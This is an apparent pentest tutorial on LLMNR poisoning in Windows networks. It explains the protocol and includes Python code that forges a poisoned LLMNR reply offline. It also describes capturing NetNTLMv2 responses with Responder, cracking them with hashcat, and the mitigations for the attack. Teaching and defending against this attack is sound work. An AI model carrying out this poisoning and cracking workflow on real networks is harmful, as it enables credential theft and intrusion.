LLMNR Poisoning
LLMNR (Link-Local Multicast Name Resolution) is a decentralized name-resolution protocol, similar to DNS, that lets hosts resolve the names of other hosts on the same local network. Its queries are sent to a link-local multicast address, so they are not forwarded by routers and never leave the local network segment.
It has been included in Windows since Windows Vista and is the third method a Windows client tries when resolving a name (after DNS and, on recent Windows versions, mDNS). The order of preference is the following:
DNS
mDNS
LLMNR
NBNS
In a Windows network, the computers listen on port 5355/UDP. To resolve a name, the client sends an LLMNR query to the multicast address 224.0.0.252 in IPv4 (FF02::1:3 in IPv6), and the answer is sent back unicast to the querier. The queries follow the DNS message format and can be used not only to ask for names, but for any other record type supported by DNS.
The common case is to use LLMNR to resolve names on the local link by sending A record queries. The computer that owns the queried name should respond, but the protocol has no authentication: any host on the segment that sees the multicast query can answer with its own address, and the client accepts the first well-formed reply whose transaction ID and question match. An attacker can use this to place their machine in the middle of the connection (MITM).
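To make the wire format concrete, here is an added example (not code from the original page) that builds an LLMNR A query the way a Windows client would send it to 224.0.0.252:5355, parses it, and forges the unicast answer a poisoner would send back. The mistyped hostname "fileshrae" and the attacker address 10.0.0.66 are constructed values; nothing is sent on the network.

```python
"""Build, parse and forge LLMNR messages (RFC 4795). Added example with constructed data."""
from __future__ import annotations
import socket
import struct

LLMNR_PORT = 5355
LLMNR_MCAST_V4 = "224.0.0.252"   # queries go here; answers are unicast back to the querier
LLMNR_MCAST_V6 = "ff02::1:3"
QTYPE_A, QCLASS_IN = 1, 1
FLAG_QR = 0x8000                 # header bit that distinguishes a response from a query


def encode_name(name: str) -> bytes:
    """DNS wire-format name: length-prefixed labels terminated by a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(data: bytes, off: int) -> tuple[str, int]:
    """Inverse of encode_name; returns (name, offset just past the terminating zero)."""
    labels = []
    while True:
        ln = data[off]
        off += 1
        if ln == 0:
            break
        if ln & 0xC0:
            raise ValueError("compression pointers are not handled by this minimal parser")
        labels.append(data[off:off + ln].decode("ascii"))
        off += ln
    return ".".join(labels), off


def build_llmnr_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """12-byte DNS-style header plus one question; all flags are zero for a query."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", qtype, QCLASS_IN)


def parse_llmnr(data: bytes) -> dict:
    """Parse the header, question section and answer section of an LLMNR message."""
    txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = decode_name(data, off)
        qtype, qclass = struct.unpack(">HH", data[off:off + 4])
        off += 4
        questions.append((name, qtype, qclass))
    for _ in range(an):
        name, off = decode_name(data, off)
        rtype, rclass, ttl, rdlen = struct.unpack(">HHIH", data[off:off + 10])
        off += 10
        answers.append((name, rtype, rclass, ttl, data[off:off + rdlen]))
        off += rdlen
    return {"id": txid, "is_response": bool(flags & FLAG_QR),
            "questions": questions, "answers": answers}


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """Answer an A query with the attacker's address. The only things binding the reply
    to the query are the 16-bit ID and the question, both copied from the query itself,
    so any host on the segment can produce an answer the client will accept."""
    q = parse_llmnr(query)
    name, qtype, qclass = q["questions"][0]
    if qtype != QTYPE_A or qclass != QCLASS_IN:
        raise ValueError("this example only poisons A/IN queries")
    header = struct.pack(">HHHHHH", q["id"], FLAG_QR, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack(">HH", qtype, qclass)
    answer = (encode_name(name) + struct.pack(">HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
              + socket.inet_aton(attacker_ip))
    return header + question + answer


if __name__ == "__main__":
    # Constructed scenario: a user mistypes \\fileshrae, DNS fails, the client falls back to LLMNR.
    query = build_llmnr_query(0x1234, "fileshrae")
    reply = build_poisoned_response(query, "10.0.0.66")
    parsed = parse_llmnr(reply)
    print("query  -> multicast", LLMNR_MCAST_V4, LLMNR_PORT, parse_llmnr(query)["questions"])
    print("reply  -> unicast to querier:", parsed["answers"][0][0], "A",
          socket.inet_ntoa(parsed["answers"][0][4]))
```

The forged reply carries nothing the attacker could not read off the multicast query, which is the whole weakness: there is no shared secret, signature or trusted server in the exchange.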
The real damage comes from what the client does next: believing it has found the host it asked for, it connects to the attacker's machine (for an SMB share, an HTTP resource, etc.) and authenticates with NTLM, sending the username together with a NetNTLMv2 challenge-response derived from the user's NT password hash. The attacker does not receive the hash itself, but the response can be brute-forced offline to recover the password.
An attacker can use Responder to collect these NetNTLMv2 responses in networks with Windows machines.
A common first step in an internal AD pentest is starting a Responder listener on the interface attached to the target segment.
Responder answers LLMNR, NBT-NS and mDNS queries with the attacker's IP and runs rogue services (SMB, HTTP and others) that complete the NTLM handshake with the victim.
Then we wait for a user to request a name that DNS cannot resolve, for example a mistyped share name or a stale drive mapping, so that the client falls back to LLMNR/NBT-NS.
Once that happens, Responder logs the username together with its NetNTLMv2 response in a format hashcat can consume directly.
Hashcat is GPU-accelerated (John the Ripper's default build runs on the CPU), so we crack the hashes on the Windows host machine with the graphics card rather than inside the Kali virtual machine, which normally has no GPU passthrough.
Notes:
Install the CUDA SDK (or the vendor's OpenCL runtime) first
The hash type is NetNTLMv2, hashcat mode 5600; Responder's log lines (user::domain:challenge:NTProofStr:blob) can be fed to it as-is
A good rule set to combine with a wordlist is OneRuleToRuleThemAll: https://github.com/NotSoSecure/password_cracking_rules
The best defense in this case is to disable LLMNR and NBT-NS.
To disable LLMNR, enable "Turn Off Multicast Name Resolution" under "Local Computer Policy -> Computer Configuration -> Administrative Templates -> Network -> DNS Client" in the Group Policy Editor (in a domain, do this in a GPO linked to all computers). The setting writes EnableMulticast = 0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient, which is the value to check when verifying hosts.
To disable NBT-NS, navigate to "Network Connections -> Network Adapter Properties -> TCP/IPv4 Properties -> Advanced -> WINS" and select "Disable NetBIOS over TCP/IP". This is a per-adapter setting (NetbiosOptions = 2 under HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_<adapter GUID>), so it has to be applied to every interface, typically through a startup script or the DHCP server's Microsoft vendor option that disables NetBIOS.
If a company must use or cannot disable LLMNR/NBT-NS, the best course of action is to:
Require Network Access Control, so that an attacker cannot simply plug into the segment and start answering queries
Require strong user passwords (e.g., more than 14 characters and no common words). The longer and less predictable the password, the harder it is for an attacker to crack the captured NetNTLMv2 response offline.